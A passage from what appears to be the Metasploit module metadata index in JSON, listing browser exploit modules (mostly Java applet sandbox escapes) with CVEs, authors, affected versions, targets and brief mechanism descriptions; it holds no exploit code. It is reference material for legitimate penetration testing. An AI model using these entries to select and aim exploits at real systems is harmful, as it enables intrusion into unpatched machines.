"URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_atomicreferencearray.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_atomicreferencearray",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_calendar_deserialize": {
"name": "Sun Java Calendar Deserialization Privilege Escalation",
"full_name": "exploit/multi/browser/java_calendar_deserialize",
"rank": 600,
"disclosure_date": "2008-12-03",
"type": "exploit",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n The payload can be either a native payload which is generated as an executable and\n dropped/executed on the target or a shell from within the Java applet in the target browser.\n\n The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).",
"references": [
"CVE-2008-5353",
"OSVDB-50500",
"URL-http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html",
"URL-http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html",
"URL-http://blog.cr0.org/2009/05/write-once-own-everyone.html"
],
"platform": "Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_calendar_deserialize.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_calendar_deserialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_getsoundbank_bof": {
"name": "Sun Java JRE getSoundbank file:// URI Buffer Overflow",
"full_name": "exploit/multi/browser/java_getsoundbank_bof",
"rank": 500,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"kf <kf_list@digitalmunition.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the getSoundbank function in the Sun JVM.\n\n The payload is serialized and passed to the applet via PARAM tags. It must be\n a native payload.\n\n The affected Java versions are JDK and JRE 6 Update 16 and earlier,\n JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n earlier, and SDK and JRE 1.3.1_26 and earlier.\n\n NOTE: Although all of the above versions are reportedly vulnerable, only\n 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.",
"references": [
"CVE-2009-3867",
"OSVDB-59711",
"BID-36881",
"ZDI-09-076"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"J2SE 1.6_16 on Windows x86",
"J2SE 1.6_16 on Mac OS X PPC",
"J2SE 1.6_16 on Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_getsoundbank_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_getsoundbank_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_driver_manager": {
"name": "Java Applet Driver Manager Privileged toString() Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_driver_manager",
"rank": 600,
"disclosure_date": "2013-01-10",
"type": "exploit",
"author": [
"James Forshaw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the java.sql.DriverManager class where the toString() method\n is called over user supplied classes from a doPrivileged block. The vulnerability\n affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer\n and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java\n Web Start can be launched automatically through the ActiveX control. Otherwise, the\n applet is launched without click-to-play bypass.",
"references": [
"CVE-2013-1488",
"OSVDB-91472",
"BID-58504",
"URL-http://www.contextis.com/research/blog/java-pwn2own/",
"URL-http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html",
"ZDI-13-076"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_driver_manager.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_driver_manager",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_exec": {
"name": "Java 7 Applet Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_exec",
"rank": 600,
"disclosure_date": "2012-08-26",
"type": "exploit",
"author": [
"Adam Gowdiak",
"James Forshaw",
"jduck <jduck@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The exploit takes advantage of two issues in JDK 7: The ClassFinder and\n MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a\n replacement for classForName back in JDK 6. It allows untrusted code to obtain a\n reference and have access to a restricted package in JDK 7, which can be used to\n abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can\n actually invoke getField() by abusing findMethod() in Statement.invokeInternal()\n (but getField() must be public, and that's not always the case in JDK 6) in order\n to access Statement.acc's private field, modify AccessControlContext, and then\n disable Security Manager. Once Security Manager is disabled, we can execute\n arbitrary Java code.\n\n Our exploit has been tested successfully against multiple platforms, including:\n IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.",
"references": [
"CVE-2012-4681",
"OSVDB-84867",
"URL-http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html",
"URL-http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html",
"URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/",
"URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html",
"URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_exec.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_glassfish_averagerangestatisticimpl": {
"name": "Java Applet AverageRangeStatisticImpl Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the AverageRangeStatisticImpl from a Java Applet to run\n arbitrary Java code outside of the sandbox, a different exploit vector than the one\n exploited in the wild in November of 2012. The vulnerability affects Java version\n 7u7 and earlier.",
"references": [
"CVE-2012-5076",
"OSVDB-86363",
"BID-56054",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076",
"URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_glassfish_averagerangestatisticimpl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_jaxws": {
"name": "Java Applet JAX-WS Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_jaxws",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in November of 2012. The\n vulnerability affects Java version 7u7 and earlier.",
"references": [
"CVE-2012-5076",
"OSVDB-86363",
"BID-56054",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html",
"URL-http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html",
"URL-http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_jaxws.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_jaxws",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_jmxbean": {
"name": "Java Applet JMX Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_jmxbean",
"rank": 600,
"disclosure_date": "2013-01-10",
"type": "exploit",
"author": [
"Unknown",
"egypt <egypt@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in January of 2013. The\n vulnerability affects Java version 7u10 and earlier.",
"references": [
"CVE-2013-0422",
"OSVDB-89059",
"US-CERT-VU-625617",
"URL-http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html",
"URL-http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/",
"URL-http://pastebin.com/cUG2ayjh"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_jmxbean.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_jmxbean",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_jmxbean_2": {
"name": "Java Applet JMX Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_jmxbean_2",
"rank": 600,
"disclosure_date": "2013-01-19",
"type": "exploit",
"author": [
"Unknown",
"Adam Gowdiak",
"SecurityObscurity",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java code\n outside of the sandbox as exploited in the wild in February of 2013. Additionally,\n this module bypasses default security settings introduced in Java 7 Update 10 to run\n unsigned applet without displaying any warning to the user.",
"references": [
"CVE-2013-0431",
"OSVDB-89613",
"BID-57726",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf",
"URL-http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html",
"URL-http://pastebin.com/QWU1rqjf",
"URL-http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_jmxbean_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_method_handle": {
"name": "Java Applet Method Handle Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_method_handle",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the Method Handle class from a Java Applet to run arbitrary\n Java code outside of the sandbox. The vulnerability affects Java version 7u7 and\n earlier.",
"references": [
"CVE-2012-5088",
"OSVDB-86352",
"BID-56057",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf",
"URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_method_handle.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_method_handle",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_provider_skeleton": {
"name": "Java Applet ProviderSkeleton Insecure Invoke Method",
"full_name": "exploit/multi/browser/java_jre17_provider_skeleton",
"rank": 500,
"disclosure_date": "2013-06-18",
"type": "exploit",
"author": [
"Adam Gowdiak",
"Matthias Kaiser"
],
"description": "This module abuses the insecure invoke() method of the ProviderSkeleton class that\n allows calling arbitrary static methods with user supplied arguments. The vulnerability\n affects Java version 7u21 and earlier.",
"references": [
"CVE-2013-2460",
"OSVDB-94346",
"URL-http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html",
"URL-http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a",
"URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf",
"URL-http://www.security-explorations.com/materials/se-2012-01-61.zip"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_provider_skeleton",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_jre17_reflection_types": {
"name": "Java Applet Reflection Type Confusion Remote Code Execution",
"full_name": "exploit/multi/browser/java_jre17_reflection_types",
"rank": 600,
"disclosure_date": "2013-01-10",
"type": "exploit",
"author": [
"Jeroen Frijters",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses Java Reflection to generate a Type Confusion, due to a weak\n access control when setting final fields on static classes, and run code outside of\n the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This\n exploit bypasses click-to-play through a specially crafted JNLP file. This bypass is\n applied mainly to IE, where Java Web Start can be launched automatically through the\n ActiveX control. Otherwise the applet is launched without click-to-play bypass.",
"references": [
"CVE-2013-2423",
"OSVDB-92348",
"BID-59162",
"URL-http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0",
"URL-http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html",
"URL-http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f",
"URL-http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html"
],
"platform": "Java,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_jre17_reflection_types.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_jre17_reflection_types",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_rhino": {
"name": "Java Applet Rhino Script Engine Remote Code Execution",
"full_name": "exploit/multi/browser/java_rhino",
"rank": 600,
"disclosure_date": "2011-10-18",
"type": "exploit",
"author": [
"Michael Schierl",
"juan vazquez <juan.vazquez@metasploit.com>",
"Edward D. Teach <teach@consortium-of-pwners.net>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Rhino Script Engine that\n can be used by a Java Applet to run arbitrary Java code outside of\n the sandbox. The vulnerability affects version 7 and version 6 update\n 27 and earlier, and should work on any browser that supports Java\n (for example: IE, Firefox, Google Chrome, etc)",
"references": [
"CVE-2011-3544",
"OSVDB-76500",
"ZDI-11-305",
"URL-http://schierlm.users.sourceforge.net/CVE-2011-3544.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Apple OSX",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_rhino.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_rhino",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_rmi_connection_impl": {
"name": "Java RMIConnectionImpl Deserialization Privilege Escalation",
"full_name": "exploit/multi/browser/java_rmi_connection_impl",
"rank": 600,
"disclosure_date": "2010-03-31",
"type": "exploit",
"author": [
"Sami Koivu",
"Matthias Kaiser",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows deserializing a MarshalledObject containing a custom\n classloader under a privileged context. The vulnerability affects\n version 6 prior to update 19 and version 5 prior to update 23.",
"references": [
"CVE-2010-0094",
"OSVDB-63484",
"URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html"
],
"platform": "Java",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_rmi_connection_impl.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_rmi_connection_impl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_setdifficm_bof": {
"name": "Sun Java JRE AWT setDiffICM Buffer Overflow",
"full_name": "exploit/multi/browser/java_setdifficm_bof",
"rank": 500,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a flaw in the setDiffICM function in the Sun JVM.\n\n The payload is serialized and passed to the applet via PARAM tags. It must be\n a native payload.\n\n The affected Java versions are JDK and JRE 6 Update 16 and earlier,\n JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n earlier, and SDK and JRE 1.3.1_26 and earlier.\n\n NOTE: Although all of the above versions are reportedly vulnerable, only\n 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.",
"references": [
"CVE-2009-3869",
"OSVDB-59710",
"BID-36881",
"ZDI-09-078"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"J2SE 1.6_16 on Windows x86",
"J2SE 1.6_16 on Mac OS X PPC",
"J2SE 1.6_16 on Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_setdifficm_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_setdifficm_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_signed_applet": {
"name": "Java Signed Applet Social Engineering Code Execution",
"full_name": "exploit/multi/browser/java_signed_applet",
"rank": 600,
"disclosure_date": "1997-02-19",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>"
],
"description": "This exploit dynamically creates a .jar file via the\n Msf::Exploit::Java mixin, then signs it. The resulting\n signed applet is presented to the victim via a web page with\n an applet tag. The victim's JVM will pop a dialog asking if\n they trust the signed applet.\n\n On older versions the dialog will display the value of CERTCN\n in the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n signature is not trusted (i.e., it's not signed by a trusted\n CA). The SigningCert option allows you to provide a trusted\n code signing cert, the values in which will override CERTCN.\n If SigningCert is not given, a randomly generated self-signed\n cert will be used.\n\n Either way, once the user clicks \"run\", the applet executes\n with full user permissions.",
"references": [
"URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)"
],
"mod_time": "2018-03-01 08:41:28 +0000",
"path": "/modules/exploits/multi/browser/java_signed_applet.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_signed_applet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_storeimagearray": {
"name": "Java storeImageArray() Invalid Array Indexing Vulnerability",
"full_name": "exploit/multi/browser/java_storeimagearray",
"rank": 500,
"disclosure_date": "2013-08-12",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses an Invalid Array Indexing Vulnerability on the\n static storeImageArray() function in order to cause a\n memory corruption and escape the Java Sandbox. The vulnerability\n affects Java version 7u21 and earlier. The module, which doesn't bypass\n click2play, has been tested successfully on Java 7u21 on Windows and\n Linux systems.",
"references": [
"CVE-2013-2465",
"OSVDB-96269",
"EDB-27526",
"PACKETSTORM-122777",
"URL-http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_storeimagearray.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_storeimagearray",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_trusted_chain": {
"name": "Java Statement.invoke() Trusted Method Chain Privilege Escalation",
"full_name": "exploit/multi/browser/java_trusted_chain",
"rank": 600,
"disclosure_date": "2010-03-31",
"type": "exploit",
"author": [
"Sami Koivu",
"Matthias Kaiser",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an untrusted method to run in a privileged context. The\n vulnerability affects version 6 prior to update 19 and version 5\n prior to update 23.",
"references": [
"CVE-2010-0840",
"OSVDB-63483",
"URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/java_trusted_chain.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_trusted_chain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_verifier_field_access": {
"name": "Java Applet Field Bytecode Verifier Cache Remote Code Execution",
"full_name": "exploit/multi/browser/java_verifier_field_access",
"rank": 600,
"disclosure_date": "2012-06-06",
"type": "exploit",
"author": [
"Stefan Cornelius",
"mihi",
"littlelightlittlefire",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in HotSpot bytecode verifier where an invalid\n optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient\n type checks. This allows a way to escape the JRE sandbox, and load additional classes\n in order to perform malicious operations.",
"references": [
"CVE-2012-1723",
"OSVDB-82877",
"BID-52161",
"URL-http://schierlm.users.sourceforge.net/CVE-2012-1723.html",
"URL-http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=829373",
"URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9",
"URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)",
"Mac OS X PPC (Native Payload)",
"Mac OS X x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/browser/java_verifier_field_access.rb",
"is_install_path": true,
"ref_name": "multi/browser/java_verifier_field_access",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/mozilla_compareto": {
"name": "Mozilla Suite/Firefox compareTo() Code Execution",
"full_name": "exploit/multi/browser/mozilla_compareto",
"rank": 300,
"disclosure_date": "2005-07-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Aviv Raff <avivra@gmail.com>"
],
"description": "This module exploits a code execution vulnerability in the Mozilla\n Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n module is a direct port of Aviv Raff's HTML PoC.",
"references": [
"CVE-2005-2265",
"OSVDB-17968",
"BID-14242",
"URL-http://www.mozilla.org/security/announce/mfsa2005-50.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox < 1.0.5, Mozilla < 1.7.10, Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/mozilla_compareto.rb",
"is_install_path": true,
"ref_name": "multi/browser/mozilla_compareto",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/mozilla_navigatorjava": {
"name": "Mozilla Suite/Firefox Navigator Object Code Execution",
"full_name": "exploit/multi/browser/mozilla_navigatorjava",
"rank": 300,
"disclosure_date": "2006-07-25",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a code execution vulnerability in the Mozilla\n Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n requires the Java plugin to be installed.",
"references": [
"CVE-2006-3677",
"OSVDB-27559",
"BID-19192",
"URL-http://www.mozilla.org/security/announce/mfsa2006-45.html"
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 1.5.0.4 Windows x86",
"Firefox 1.5.0.4 Linux x86",
"Firefox 1.5.0.4 Mac OS X PPC",
"Firefox 1.5.0.4 Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/mozilla_navigatorjava.rb",
"is_install_path": true,
"ref_name": "multi/browser/mozilla_navigatorjava",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/msfd_rce_browser": {
"name": "Metasploit msfd Remote Code Execution via Browser",
"full_name": "exploit/multi/browser/msfd_rce_browser",
"rank": 300,
"disclosure_date": "2018-04-11",
"type": "exploit",
"author": [
"Robin Stenvi <robin.stenvi@gmail.com>"
],
"description": "Metasploit's msfd-service makes it possible to get a msfconsole-like\n interface over a TCP socket. This module connects to the msfd-socket\n through the victim's browser.\n\n To execute msfconsole-commands in JavaScript from a web application,\n this module places the payload in the POST-data. These POST-requests\n can be sent cross-domain and can therefore be sent to localhost on the\n victim's machine. The msfconsole-command to execute code is 'rbi -e\n \"CODE\"'.\n\n Exploitation when the browser is running on Windows is unreliable and\n the exploit is only usable when IE is used and the quiet-flag has been\n passed to msf-daemon.",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-04-27 18:35:30 +0000",
"path": "/modules/exploits/multi/browser/msfd_rce_browser.rb",
"is_install_path": true,
"ref_name": "multi/browser/msfd_rce_browser",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/opera_configoverwrite": {
"name": "Opera 9 Configuration Overwrite",
"full_name": "exploit/multi/browser/opera_configoverwrite",
"rank": 600,
"disclosure_date": "2007-03-05",
